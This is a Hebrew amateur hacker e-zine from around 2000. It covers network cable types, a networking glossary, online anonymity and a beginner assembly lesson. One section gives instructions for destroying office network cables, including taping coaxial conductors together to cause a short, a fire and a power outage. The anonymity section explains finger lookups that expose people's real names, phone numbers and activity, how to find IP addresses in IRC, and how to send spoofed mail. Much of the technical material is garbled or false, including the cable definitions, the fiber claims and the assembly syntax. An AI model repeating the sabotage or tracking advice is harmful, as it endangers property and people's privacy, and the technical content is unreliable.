כל סוגי הכבלים מתחלקים לשלוש חלוקות עיקריות.

        ·           כבלים שזורים

        ·           כבל קוקסיאלי

        ·           סיב אופטי

 

כבל זוג שזור. (UTP)

ישנם שני סוגים :

מסוכך ולא מסוכך.

המסוכך (Twisted Pair) הוא:שני חוטי נחושת מלופפים זה סביב זה ומבטלים הפרעות בין החוטים.

 

הלא מסוכך ( UnshildedTwisted Pair)הוא:שני חוטי נחושת מלופפים זה סביב זה עם חוט מפריד

ביניהם ומבטלים הפרעות בין החוטים.

 

אין ביניהם הבדל רב אבל הם הכבלים הנפוצים ביותר לעבודה משרדית ואני בטוח שבכמה בתי ספר משתמשים בכבלים הנ"ל.

כבלי ה- UTP / TP יוצאים מכרטיס הרשת לתקע בקיר (Rj45) אשר מועברים דרך כבל זהה לרכזת.

טבלת סיכום של ה TP / UTP.

אורך מירבי 100M (328 feet)

מהירות 10Mbps  בד"כ אבל יכול להיות גם 100

התקנה/תחזוקה פשוטה ביותר וקלה.

הפרעות רגיש במיוחד.

עלות הזול ביותר .

 

ישנתם כמו כן אותם גרסאות של כבלים רק כפולים.

 

Unshielded Double Twisted Pair. / shielded Double Twisted Pair.

ההבדל ביניהם הוא שבכל הכפול יש 2 ארבע חוטים אשר מלופפים לשתי קבוצות.

בכך היא מורידה את אחוז ההפרעות לאחוז פחות יותר ומשפרת את ביצועי הכבל.שוי נחושת  ארוגה בין החוט ארוגה בין החוטים למעטפת בפלסטיק. 

טבלת סיכום של ה STP / SUTP.

אורך מירבי 100M (328 feet)

מהירות 155Mbps  

התקנה/תחזוקה קלה אבל צריך מחברים מיוחדים. פחות גמיש מהרגיל.

הפרעות עמיד בפני הפרעות.

עלות יקר מה- TP אך זול לעומת האחרים.

 

 

כבל קוקסיאלי

 

 

 

 

 


מורכב משני כבלים אשר מופרדים ע"י שכבת בידוד(כתום).

הליבה המרכזית היא בד"כ מספר סיבי נחושת מופרדים.

מעטפת פלסטיק לשמירה על הליבה עשוי כמו כן מסיבי נחושת מופרדים(כחול).

הנתונים מועברים ע"י הליבה המרכזית צבע כתום בתמונה.

ישנם שני סוגים של הכבל הנ"ל.

ThinNet – Connected to the plug  (שקע) with RG58 connectors.

ThickNet - Connected to the plug  (שקע) with RG8, RG11 connectors.

 

בכל הכבלים המוליך החיצוני הוא מוארק ומונע הפרעות וחיבול בכבל ע"י סיכוך.

Text Box: כרטיס רשת מחבר מיוחד תקע בקיר של הטלפון

 


Text Box: תקע קיר

Rg58, Rg8
 

 

 

 

 

 

 

 

 


טבלת סיכום thinnet / ThickNet (קוקסיאל).

ThickNet

ThinNet

אורך מירבי : 500

אורך מירבי :185

מהירות : 10mbps

מהירות : 10mbps

התקנה: קשה

התקנה: קלה

הפרעות: נמוך מאוד

הפרעות: נמוך מאוד

עלות: גבוהה

עלות: נמוך

 

 

 

 

כבל סיב אופטי Fiber Optic.

חיבור הרשת הטוב ביותר שקיים.

הנתונים מועברים בדרך אור ולא כאות חשמלי.

הכבל אינו רגיש להפרעות ואינו מחולל הפרעות ופגיעות בקו השידור.

הם מסוגלים להעביר כמות אדירה של מידע לעומת כבלים אחרים.

בלתי אפשר לצטט ולהפריע לכבל.

כך הנתונים עוברים בכבל כאשר כל דפנה היא כמו מן מראה:

 

 

 

 


הכבל בנוי מ Input ו OutPut.

כאשר ה- OUTPUT שולח תגובות אור כ 2mhz.

וה- INPUT שולח תגובות אור כ 12mhz.

 

טבלת סיכום לכבל האופטי:

אורך מירבי 2000M

מהירות 100-2000Mbps

התקנה/תחזוקה קשה

הפרעות אין , לא היו ולא יהיו.

עלות יקר במיוחד 7 דולר למטר (נכון לשנת 2000).

 

טבלת סיכום כללית :

 

עלות

הפרעות

התקנה

MBPS

אורך

סוג כבל

נמוך

גבוה

קלה

10-100

100

TP/UTP

נמוך

גבוה

קלה

16-155

100

STP/SUTP

נמוך

נמוך

קלה

10

185

ThinNet

גבוה

נמוך מאוד

קשה

10

500

ThickNet

גבוה במיוחד

אין

קשה מאוד

100-2000

1000

Optic

 

 

 

By Pirs[I]ng

איך להרוס סוגים שונים של כבלים

 

דרכים להרוס את הכבלים הנ"ל: אני לא אפרט מה עושה מה כי זה יקח שנים פשוט אני אכתוב מה לעשות, איך ולאיזה קבל.

 

 

 

TP / UTP / STP / SUTP אתם לוקחים קיסם ומכסים אותו בסוכר.

תוקעים אותו בתוך הכבל, בערך באמצע שלו. תדאגו שהמקום שבו תקעתם את הקיסם מכוסה הסוכר הוא קרוב לשמש, גלוי לשמש. תשאירו את הכבל ככה ל 22 שעות והוא גמור.

 

 

 

 

ThinNet / ThickNet אתם לוקחים את הכבל ופותחים אותו. תראו מה יש בפנים.

לפי מה שאני יודע אתם תמצאו שם 4 חוטים אדומים וכל השאר לא מעניינים.

קחו את ההארבעה האדומים הללו וחפשו אותם. עכשיו חברו את כל הקצוות החשופים אם צלוטייפ (או כל נייר דבק אחר שיחזיק אותם ליום שלם). לאחר כ 14 שעות בערך יהיה קצר הכבל ישרף, גם הכרטיס רשת, ותהיה הפסקת חשמל.

 

By Pirs[I]ng

מושגים

 

 

Admin - אדמינסטור (מנהל רשת)

DNS - dmain name server> - שם של דומיין שניתן ע"י שרת כשלהו

ISO - Organization for International Standarrds / International Standardization Organization

TCP/IP - פרוטוקול התקשורת הנפוץ ביותר בעולם ומהווה את הבסיס לרשת האינטרנט.

         מבוסס על העקרון שלכל מחשב המחובר לרשת יש כתובת אי.פי המייצגת אותו

         ועל ידי קריאה למספר זה ניתן להעביר מידע ממחשב למחשב.

         הבסיס בשיטת העברת נתונית זו היא הפטקא. לכל פטקא מומצד תווית מוצא ומטרה

         האומרות לפאקט לאן להשלח. הפאקט מועבר בעצמות פרוטוקול הטי.סי.פי/אי.פי

LAN - רשת מקומית.

WAN - כמו רשת מקומית רק גדולה יותר בטווח.

WWW - World Wide Web -  רשת האינטרנט.

PPP - פרוטוקול המשמש לחיבור מחשבים דרך מודם. נפוץ בשימוש בעת חיבור לאינטרנט.

PAP - פרוטוקול לאימות סיסמא וזיהוי המשתמש.

Repeater - Works under Physical Layer on the OSI<. משחזר, מתגבר על מגבלות מרחק ומשחזר את האות אשר הגיע מהצד הרחוק.

Bridge - גשר, משש לחיבור צמתים שונים ברשת, לגשרים אין כתובות ואי אפשר לפנות אליהם לצורך מסוים.

Router - נתב, בוחן את כתובות היעד ומחליט מאיזה נתיב לשדר ולאן. 

RIP - Routing Information Protocol - בחירת נתיב שידור כתוצאה מבחירה בעזרת בדיקה אשר בודקת מספר קוי תקשורת מינימליים.

SPF - Shortest Path First - שיפור של הריפ בשיטת בחירה זאת נלקחים בחשבון הפריטים הבאים : מחיר הקו, עומס ומהירות תעבורה.

GateWay - שער גישור, יחידת הפלט של הראוטר , משם יוצא המידע לא משנה באיזה דרך שידור. משם הוא יוצא !

PING -  שולח פאקט למחשב מסויים שאומר למחשב להחזיר תשובה וכך  בודק את זמן התגובה של

        המחשב ורואה את מהירות החיבור בין שתיי המחשבים.

FTP  - File Transport Protocol - יישום זה מאפשר העברת קבצים בין מחשבים שונים ברשת.

Email - יישום הדואר האלקטרוני אשר מאפשר שליחת דואר אלקטרוני בכל רחבי רשת האינטרנט.

HTTP -  תקן לדפי היפר טקסט אשר מוצגים באינטרנט. (HTML)

TELNET - יישום המאפשר חיבור כמסוף אל מחשב מרוחק ברשת.

IRC - פרוטוקול אשר מאפשר שיחה בין אנשים ברשת בזמן אמת.

Packet - קבוצת נתונים קצרה המשודרת ברשת ברצף. מידע הזורם ברשת מפורק לפאקטים קטנים (מנות, חבילות) על

         מנת להקל על בקרת שגיאות. פאקט בעצם מעביר מידע בין מחשבים.

BaseBand - פס בסיס, בשיטה הזאת קיים פס תקשורת פיסי אשר מקשר בין שתי מערכות או יותר.

BroadCast  - שידור של אות או אותות כלשהם

Hub -  מכשיר אלקטרוני המכיל חיבוריי רשת רבים. לכל אחד מהחיבוריפם ניתן לחבר מחשב בעזרת כבלי רשת.

       המכשיר מקבל אותות של מידע מהמחשבים שמבחורים ברשת ומעביר אותם למחשבים האחרים או לכתובת יעד

       אחרת לפי בקשת המידע.

Modem - מודם, חומרה אשר מאפשרת לך להתחבר לאינטרנט ע"י קו טלפון והגדרת פרוטוקולים נכונים.

pptp = Point - to - Point - Tunneling Protocol -  מספק סקירה כללית של פרוטוקול  תיעול נקודה לנקודה.

BackDoor - שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב אחר יותר בקלות..

           לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות שיבצעו

           פעולה כלשהי לפי מה שמכין הבאקדור קבע.

           לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים כדי שהפריצה הבאה למערכת תהיה פשוטה יותר !

Exploit - ניצול של חורי אבטחה - קודים\דרכים לנצל חורי אבטחה במערכות ..

LinuX - .מערכת הפעלה המבוססת על יוניקס , בעלת קוד פתוח וניתנת להורדה ולשימוש בחינם

FireWall - מערכת להגנה מפני גישה לא מורשת למחשב מקומי או רשת מקומית שמחוברת לאינטרנט.

Proxy - שרת המוקם על ידי ספקי שירות (חברות אינטרנט, חברות גדולות וכו') למען לקוחותיו ותפקידו ליצור

        קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים. לשרת הפרוקסי חיבור מהיר הרבה יותר

        משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו.

        אם הרבה אנשים מבקשים את אותו קובץ - הקובץ נשמר בשרת הפרוקסי, ובכך חוסך לגולשים את ההמתנה

        לקבלת המידע משרת האינטרנט המרוחק. על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש כפיירוול

        אבל בר.

Protocol - סדר פקודות\הוראות מוסכמות ומאפשרות לתכנן מערכות בכל העולם שיבינו ויוכלו לתקשר אחת עם השניה.

Binary - שפה המורכבת מ - 0, 1 והמחשב מבין אותה, רק אותה.

Socket (Hardware) - התקן אשר לתוכו אפשר לתקוע רכיב אלקטרוני ולשחררו ללא צורך בהלחמה.

Socket (Software) - כדיי שתוכנה תוכל לתקשר עם מחשב אחר עליה ליצור קשר דרך סוקט, התוכנה מבצעת

                    פתיחה של סוקט לתוך סוקט שפתוח כשרת על מחשב אחר ויוצרת חיבור בין המחשבים

                    ומעבירה פאקטים בינהם.

Compiler - מחולל שינוי במה שכתבת בשפה תכנות כלשהי והופך את זה לשפת מחשב, בינארי .

 

By Pirs[I]ng & Rul3r .


אנונימיות - אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים

 

טוב כולכם אבל אני מדגיש כולכם ממש ממש ממש לא אנונימיים כל פעם שאתם מורידים קובץ מאתר אז אנשי האתר יכולים (אם הם רוצים) לדעת עליכם :

IP

ISP

ארץ

עיר

סוג הדפדפן

OS

רזולוציית מסך

ה URL הקודם שביקרתם בו

 

עכשיו אתם בטח אומרים : נו אז מה למי איכפת שהאתר ידע מה רזולוציית המסך שלי...

אז אתם טועים ובגדול כי אם אתר מחורבן יכול לעשות את זה אז לאדם שקצת מתמצא בנושא אז זה לא בעיה לגלות עליכם דברים הנה עוד דוגמא :

במירס אפשר גם כן לגלות על מישהו הרבה דברים (במקרה הטוב הוא לא מסתיר את הדברים האלה)

שם אמיתי

כתובת

אי מייל

IP

ISP

ארץ

עיר

 

אותו דבר גם במשחקי רשת ודברים כאלה....

 

נגיד אם יש לכם אי מייל של ה

ISP

שלכם הנה דוגמא אם לא הבנתם:

 

[email protected]         

                             

אז אתם יכולים להכנס ל        

zahav.net.il                 

פורט                         

79                           

                             

שזה פורט                      

FINGER                       

ושם אתם יכולים לגלות מלא על מוקי שלנו כמו שם אמיתי פעם אחרונה שהוא התחבר לפעמים מספר טלפון אם יש לו אי מייל אחר

עכשיו אני לא יודע אם זה מקומי או כללי  וורטקס אמר לי שזה מקומי והוא נתן לי הסבר מאוד מאוד משכנע וסייבר פאנק ועוד איזה אחד אמרו לי שזה כללי ולא נתנו לי הסבר תחליטו לבד...

איפה הקאצ'

הנה יש מלא סרברים שחסמו את זה אבל אם זה באמת מקומים אז יש לכם יותר סיכוי להצליח למצוא כי יש יותר

(יותר סרברים יותר סיכוי)

 

נכון זה נורא מעצבן אם אתם רוצים לדבר עם מישהו באיי סי קיו והוא יענו לא מחובר אבל יש לכם הרגשה שהוא מתעלם ממכם אז אני מביא את הגאולה נכון יש תוכנה שמגלה אבל הרבה הרבה יותר כיף לעשות דברים ידנית (אפילו לקרוא אי מייל) אם אתם יודעים את האי מייל שלו אז תכנסו לפינגר שדיברתי עליו מקודם ותראו אם הוא באינטרנט או לא

 

מייל אנונימי

 

כל פעם שאתם מקבלים אי מייל אז אם תלחצו לחצן ימני על המייל ואז proparties אז תקבלו את ה IP של השולח אפילו אם תשלחו אי מייל מזוייף עם טלנט יראו את ה IP שלכם (זאת אחת הדרכים לגלות אי מייל מזוייף)

שאלה: איך עוקפים את זה?

אז יש remailer שזה כמו לינק אם שולחים ל נגיד [email protected] אז זה אוטומטית מעביר את הדואר ל [email protected]

זה טוב ויפה אבל מה קורה כשאתם רוצים לשלוח דואר אז יש שירותי remailer שזה כמו פרוקסי אחרי השליחה רואים את הIP של הremailer ולא את שלכם

שאלה: איך משתמשים בשירותי remailer לשליחת דואר אנונימי?

אז אתם נכנסים עם טלנט לשרת פורט 25 מכניסים את השם משתמש והסיסמא (רישום חינם) ואז משם אתם שולחים אם אתם לא בדיוק מבינים מה לעשות מקסימום תדברו איתי במירס

 

עוד שיטה לאי מייל אנונימי אבל זה סוג אחר של אנונימיות המטרה של זה שאחרים לא יקראו ולא שלא יגלו אותך אז הנה השיטה

PGP

אם אתם לא יודעים מה זה תכנסו ל www.whatis.com ותחפשו שם (יש שם הסברים מצויינים כמעט לכל דבר)

 

 

עוד על הדואר

 

שאלה: איך אני מגלה אם הדואר שקיבלתי מזוייף או לא?

קודם כל יש את ה header כדי להכנס אליו לוחצים לחצן ימני על המכתב properties שם ב details

זה בעצם ה header עכשיו אם הוא קצר (עשר שורות אבל כל שורה דיי קצרה) אז זה כבר מעלה חשד עכשיו את תסתכלו ב header תראו שיש שם אנפורמציות דיי מענינות כמו האיי פי של השולח שרת הדואר שממנו נשלח או שרת הדואר שמצויין אם זה באמת מזוייף אז זה השרת שהתחברו אליו וממנו זייפו אז אם זיוף רציני על משהו חשוב אז החברה יכולה להסתכל בלוגים של השרת ולראות לפי האיי פי שלכם (הוא כבר כתוב ב header ) מה בדיוק מה עשיתם אז נחזור לעניינינו איך מגלים אם זה מזוייף, אז באי מייל אמיתי יש STMP ID אם אין זה בטוח מזוייף אבל גם אם יש זה עדיין לא מאה אחוז מזוייף עוד דבר יש תוכנה שאם מכניסים איי פי אז הוא אומר לך איזה ISP זה אם תעשו את זה אז זה ממש עוזר כי קיבלתם מייל מאנגליה ואתם חושדים שזה מזוייף תכנסו לתוכנה תכניסו את ה IP ואם כתוב שזה נגיד אינטרנט זהב אז זה לא אנגליה...

האתר של התוכנה הזאת היא בסוף הטקסט בקטע של הלינקים

 

 

Coockies

 

אני מניח שאתם כבר יודעים מה זה אז מה לעזאזל אני רוצה ממכם אז זהו שאם מישהו משיג את הקוקיז שלכם לא הכי קשה להשיג אז יש לו סיכוי קטן אבל יש לפענח את ההצפנה של הקוקי במיוחד אם זה אתר מחורבן

ועוד משהו אתרים יכולים לגלות עליכם הרבה יותר ממה שאתם חושבים רק על ידי שימוש בקוקיז

מסקנה: כדאי למחוק אותם אבל לא צריך להיות יותר מידי פרנואידים

 

 

 

 

 

קבצים שמכילים פרטים עליכם

 

טוב אם אתם רוצים למחוק את כל הקבצים שמכילים פרטים עליכם כדאי שתשרפו את ההארד דיסק אבל הנה דברים שאתם יכולים למחוק

קוקיז (בתיקייה של הקוקיז וב temporary internet files  יש גם שם מלא קוקיז)

FILE0001.chk

FILE0001.chk

בדרך כלל נמצאים בכונן סי

 

 

MIRC

 

אין כל כך הרבה מה לעשות או שיש ואני לא אומר... :) סתאאאאאם

אפשר בשרתים מסויימים להסתיר את האיי פי על ידי הפקודה הבאה

/mode yournick +x

לא בכל השרתים זה עובד

שאלה: טוב ויפה אבל איך מגלים איי פי במירס זה מה שכולנו באמת רוצים לדעת...

אז אפשר לעשות

DCC chat

ואז לעשות netstat

תאמינו לי עובד מצויין

או

/dns

יש שרטים שחוסמים את זה (רובם) בגלל זה השיטה שקודמת הרבה יותר טוב

אפשר גם במירס להכניס פרוקסי תבדקו באפשרויות של מירס ממש פשוט להכניס שם את הפרטים

 

 

ICQ

 

כדי להסתיר את האיי פי שלכם תעשו את הדברים הבאים:

כנסו ל Preferences שם לכן ל connections שם תסמנו את I'm using a permanent internet conection (LAN)

שם תסמנו את I am behind a fire-wall תסמנו את I am using a sock 4 proxy תלחצו next אחרי זה הוא יבקש איי פי תתנו את האיי פי של הפרוקסי אחרי זה הוא ישאל אותכם על sock port 4 תכתבו שם 4000 אחרי זה תסמנו את open an outgoing UPD port 4000 on my fire-wall תלחצו next אחרי זה תופיע ההודעה check my fire-wall/proxy conection חשוב מאוד להיות מחובר לאינטרנט אבל לא לרשת ה ICQ זה חשוב מאוד

זהו

כדי להחזיר את המצב פשוט תחזרו למצב מודם רגיל בהגדרות

 

 

לינקים

http://www.pgpi.com על הצפנה והצפנת האי מיילים שלכם

http://www.cyberarmy.com/lists רשימה של פרוקסיז אנונימיים טובים

http://www.multiproxy.org/anon_list.htm רשימה של פרוקסיז מצוווווינים (תודה לסינטאקס)

www.neotracer.com - התוכנה שמאתרת איי אס פי

 

By NDR113

אסמבלר

 

מה זה אסמבלר בכלל ? בטוח שמעתם את השם הזה פעם או פעמיים בחיים אז אני יסביר מה זה ולמה זה.

מה בכתבה ?

        ·            הסבר קצר על אסמבלר

        ·            בסיסי ספירה

        ·            המרה מבינארי לדצימלי

        ·            אוגרים

        ·           פקודות

הסבר.

אסמבלר היא שפת תכנות אשר לוקחת פקודות מחשב פשוטות והופכת אותם לחבילות של ביטים אשר עובדים תחת אוגרים ומריצים את הפקודות שכתבתם בה בתור תוכנית.

אסמבלר היא שפת סף, היא לא שפה עלית כמו סי או ויז'ואל בייסיק.

 

/* הכוונה היא: C לדוגמה היא שפת תכנות הגיונית. אתם אומרים לה

printf

והיא מדפיסה משהו על המסך. לעומתה אסמבלר זה הדבר הכי קרוב לשפת מכונה (אחרי שפה בינארית כמובן) שאפשר לתכנת בו. אם תסתכלו על קוד של אסמבלי לא תבינו מיד מה הוא עושה, אלא תצטרכו לעקוב, לחשוב, להסתכל ולנסות להבין מה בדיוק דוחפים למחסנית ולמה כשעושים

push %eax

לדוגמה. בלאדי. */

 

נתחיל את כל הלמידה שלנו ממשהו פשוט:

 

בסיסי ספירה.

הקסדצימלי (בסיס 16)

דצימלי (בסיס 10)

אוקטאלי (בסיס 8)

בינארי (בסיס 2)

0

0

0

0000

1

1

1

0001

2

2

2

0010

3

3

3

0011

4

4

4

0100

5

5

5

0101

6

6

6

0110

7

7

7

0111

8

8

-------------------

1000

9

9

-------------------

1001

A

10

-------------------

1010

B

11

-------------------

1011

C

12

-------------------

1100

D

13

-------------------

1101

E

14

-------------------

1110

F

15

-------------------

1111

כמה דברים שכדאי לזכור !!!

1.       בסיס בינארי מתאפיין רק בשני מספרים, 0 ואחד.

2.       במספרים בינארי יש דבר שנקרא אפס מוביל, למשל אתה צריכים מילה בינארית למילת מחשב בת 7 אותיות אבל מספר הבינארי שלכם הוא 6 אותיות אז אתם יכולים להוסיף אפס משמאל והמחשב מתייחס אליו כמו ל 0 ואילו אם תוסיפו מצד שני, זה יהיה מספר אחר והמחשב לא יריץ את התוכנית הנכונה. דוגמא:

6 אותיות 1101010 , 7 אותיות 01101010, שימו לב לאפס האדום שהוספתי.

3. כל בסיס פרט לבינארי ימשיך את סדרת המספרים העולה עד למספר של הבסיס פחות אחד, דוגמא, בסיס 15 יהיה מספר 0-14. בסיס 99 יהיה מספרים 0-98.

4. הטבלה שלמעלה תעזור לכם להמיר מספר, אם אתם צריכים להמיר מספר 15 באוקטלי למספר בדצימלי אז מה עושים ?

לוקחים את 1 שזה 0001 ולוקחים את 5 שזה 0101 ומחברים, קיבלתם 000101010 ועכשיו עושים המרה למספר רגיל (דצימלי). והנה ההסבר איך להפוך מבינארי לעשרוני (דצימלי).

המרה מבינארי לדצימלי:

 

איך אני הופך מבינארי לעשרוני.

הסבר ודוגמא:

ניקח את המספר 00110011, בחישוב מהיר הוא מסמל את המספר 51.

אוקי איך עשיתי את זה.

הנה היא הטבלה של הבינארי במחשבים.

 

128

64

32

16

8

4

2

1

נכניס את הבינארי מתחת.

0

0

1

1

0

0

1

1

 

עכשיו אם יש מתחת לספרה האמיתית 0 אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה שכתוב מעל ה1.

למשל:

יש אחד מעל האחד אז זוכרים 1, יש אחד מעל ה 2, זוכרים עוד 2,

וכו' עד שמגיעים ל: 1+2+16+32 = 51.

ברור ? אני אתן לכם פה תרגילים או שתיים:

11001100 = ?

00000010 = ?

בראשון אמור לצאת 204.

בשני אמור לצאת 2.

אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה.

עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל.

ניקל את המספר 143 ואז מה עושים ?

 

128

64

32

16

8

4

2

1

 

יאללה בוא נתחיל, משמאל לימין,

האם 143 נכנס בתיבה של 128, אם הוא גדול מ 128 זה אומר שכן, אז נרשום שם אחד.

עכשיו נשאר לנו 15 (143-128).

נמשיך, 15 נכנס ב 64, לא. נכתוב שם אפס, האם 15 נכנס ב 32, גם לא, נשאיר שם אפס.

15 לא נכנס ב 16, אז נכתוב גם שם 0.

15 נכנס ב 8, כן אז נכתוב שם אחד ונשאר לנו 7 (15-8) .

7 נכנס ב 4, כן נכתוב אחד ונשאר לנו 3 (7-4)

3 נכנס ב שתיים, כן נכתוב שם אחד ונשאר לנו אחד (3-2).

ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב 1.

איזה בינארי יצא לנו ?

10001111

מקווה שהבנתם, אם לא, אז תחזרו על זה

128

64

32

16

8

4

2

1

1

0

0

0

1

1

1

1

אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה).

** הנה שיטה שתעשה לכם חיים קלים, אם צריכים להפוך מספר מבסיס X (כל בסיס חוץ מבינארי) לבסיס דצימלי (עשרוני) אז קודם עושים המרה לבינארי לפי הטבלה שלמעלה ואז מבינארי לעשרוני, תאמינו לי הכי קל.

עכשיו הייתי מעוניין להתחיל לדבר קצת על אוגרים.

 

 

אוגרים:

אוגרים הם בעצם תאי זיכרון בתוך המעבד, ישנם 4 אוגרים כלליים שבד"כ מתכנתים באסמבלר משתמשים בהם והם, Ax, Bx, Cx, Dx וישנו עוד אוגר IP אבל לא צריך אותו כרגע, נחזור אליו בעתיד.

כל אוגר הוא אוגר של 16 סיביות, שניתן לחלקו לשני חלקים, כל חלק 8 סיביות.

עכשיו מה הפרוש הפרקטי של כל אוגר :

Ax – accumulator

Bx – base

Cx – count

Dx – data

IP – instruction pointer

 

/* פירסינג יקירי, שכחת לציין מה תפקידו של כל אוגר

ככה: AX  משמש בד"כ לזכור ערכים. ביצעתם פעולה חשבונית? אחסנתם מספר? זה בד"כ יהיה מאוחסן באוגר הזה.

BX  אומר לפי איזה בסיס לבצע חישובים. לא מעניין כרגע.

CX הוא מונה. אם יש לכם לופ ואתם צריכים מונה, תשתמשו באוגר הזה.

DX גם לאחסון ערכים.

IP זה אוגר מאוד מאוד חשוב. לא מכניסים בו ערכים. הוא משמש לציין איפה ההתחלה של התוכנית שלכם, ז"א מאיפה להתחיל לבצע את ההוראות.

את כל האוגרים האלה ועוד הרבה הרבה אחרים תראו בעזרת תוכנת

debug שבאה עם דוס. כדי ללמוד איך להשתמש בתוכנה, פנו ל reference בסוף הטקסט הזה. בלאדי. */

 

בואו נגיד שזהו אוגר ה Ax שלנו, אני יסביר איך הוא בנוי.

 

 

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

 

 

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

 

 

האוגר שיותר למעלה, מראה לכם את AX במצב טבעי, כולל את כל 16 הביטים שלו ואילו האוגר שיותר למטה מחולק לשתיים, כל חלק 8 ביט כמו שכתבתי למעלה.

ניתן לך תרשים של כל האוגרים שנשתמש בהם:

 

 

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Ax

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Bx

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Cx

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Dx

 

 

 

אני בטוח ששמתם לב שאמרתי שיש 16 ביטים בכל אוגר וכתוב רק 15, לאלה שלא הבינו למה, כמו שאמרתי למעלה, באסמבלר עושים את כל הסדרה פחות 1 (0 משומש כמו-כן).

אוקי, אני מקווה שעד לפה אתם עוקבים ועכשיו הייתי רוצה לעבור לפקודות.

אוקי עכשיו עוד משהו, כל אוגר שמחולק לשתיים יקרא כך

Ax -  |          AL                 |               AH

AH מסמל אוגר A–high ואילו AL מסמל אוגר A–low.

ככה כל אחד ואחד מהם, מ AX עד ל DX.

AX שווה 16 סיביות, ואילו AL שווה 8 סיביות, חשוב מאוד לזכור את זה, קצת תרגול:

אני רושם אוגר או חלק מאוגר ואתם רושמים כמה סיביות יש בתוכו.

AX =  ?

BL =  ?

AL = ?

CH =  ?

DL =  ?

(תשובות בסדר יורד, 16,8,8,8,8,)

(* רמז, הראשון זה 16.)

 

פקודות.

אני אתן פקודה, איך כותבים אותה ומה פירוש הפקודה.

לא לשכוח, יש פסיק אחרי כל שם של אוגר ולא לשכוח נקודה פסיק בסוף הפקודה (;).

ברירת המחדל של הקומפלייר היא שונה בכל תוכנה ותוכנה יש כאלה שאצלם ברירת המחדל היא 16, אז כל מספר שתכניס היא תחשיב אותו בבסיס 16 וכדומה, אז בואו נגיד שכרגע ברירת המחדל שלנו היא 10, בסיס דצימלי, עשרוני.

הדוגמא תהיה מסומנת באדום.

 

Mov – העתקה של ערך

Mov Op1, Op2;  - צורה

Mov Ax, 123; (Axß123)

 

Add – פעולת חיבור בין שני ערכים

Add Op1, Op2;  - צורה

Mov Ax, 12;

Mov Bx, 12;

Add Ax, Bx; (Ax ß 24)

 

Sub – פעולת חיסור בין שני ערכים

Sub Op1, Op2;  - צורה

Mov Ax, 12;

Mov Bx, 12;

Sub Ax, Bx; (Ax ß 0)

 

אני חושב שזה מספיק בינתיים, עכשיו אני אתן לכם כמה תרגילים , תעבדו עליהם, תיישמו את מה שלמדתם וניפגש בכתבה הבאה שלי, עד אז, יבוא שלום על ישראל.

 

האוגר AX קולט ערך 12, האוגר BX קולט ערך 15, האוגר CX קולט ערך 18 ואז עושים חשבון בין כולם, אוגר AX יהיה שווה 45.

אם לא תצליחו אז אני מוסיף בסוף העמוד את התשובה הנכונה:

 

להתראות ועד לפעם הבאה, שמרו על עצמכם, Pirsing

 

 

 

 

///////////////////

Mov ax, 12;

Mov bx, 15;

Mov cx, 18;

Add Ax, Bx;

Add Ax, Cx;

///////////////////

 

/* reference:

"המדריך לשפת אסמבלי" (הוצאת הוד עמי). יש שם המון זבל, אבל ה - 10 פרקים הראשונים רלוונטיים לנו.

שמעתי על ספר מצויין בנושא של כותב ישראלי, לצערי אני לא זוכרת את השם. אלי משהו. J

 

כמו כן, 2 מדריכים של פראק:

Smashing the stack for fun and profit

Win32 buffer overflows

 

הספר הראשון גם יציג לכם את תוכנת debug וכך תוכלו לנסות דוגמאות פשוטות כמו הדוגמאות הנ"ל. אין צורך להוריד תוכנת אסמבלר (לא קוראים לזה "קומפיילר", כי זאת לא שפת עילית) מורכבת כמו MASM  לצורך הזה.

בלאדי. */

 

             [EOF]              144-144-144-144-144     [EOF]  

 

By Pirs[I]ng 

 

צרו קשר

 

שלום .

הכל טוב ?

 

נגמרו הכתבות , עכשיו נעבור לשלושת העמודים המסיימים את הספר ...

 

איך ליצור קשר :

 

אוקי ... אני לא אענה על שאלות כמו  :

1.       תפרוץ לי בבקשה .

2.       שכחתי את הסיסמא של האי מאייל אנא תעזור לי

3.       אני חייב שתפרוץ לי לאנשהו

4.       אני ישלם לך בעד שתפרוץ

5.       ועוד שטויות מהסוג הזה

 

אני לא מבטיח לענות לכל אחד אבל מבטיח לנסות אז ככה ...

 

האתר עם הקבצים הוא –

http://freehost18.websamba.com/razor

 

 

אני הולך לפרסם את האי סי קיו  שלי ואני יודע שהוא הולך להיות מוצף באנשים אז חבר'ס בבקשה אל תעלבו אם אני לא עונה ... יש לי עכשיו קרוב ל30 אנשים און-ליין ...

 

My Icq - 124157810

 

לתגובות, להסביר כמה שאת\ה אוהבת אותי או כמה שאת\ה שונאת אותי – בקיצור כל מה שלא קשור לשאלות  שלחו לי ל :

 

[email protected]

 

לשאלות תשלחו איי מאייל ל :

 

[email protected]

 

ומי שרוצה להצטרף לכותבי הספר הבא ( כנראה שנה הבאה ) אנא שלחו כתבות גם ל :

 

[email protected]

 

אם תרצו ליצור קשר עם אחד ההאקרים\קראקרים האחרים בספר שלחו לי הודעה עם השאלה ואני כבר יצור את הקשר בניכם ...

 

By Razor

 

 

 

 

 

תודות

 

זהו אין יותר עבודה עד 2:30 בלילה – עכשיו נשאר רק לכתוב תודות ():

 

טוב קדימה, נתחיל זה ארוך ....

 

קודם כל אני חייב להודות למי שלימד אותי מחשבים והאקינג ובגללו אני יכול ללמד אותכם :

 

תודה לך Jacob , תודה לך SBH , תודה לך אלוהים .

 

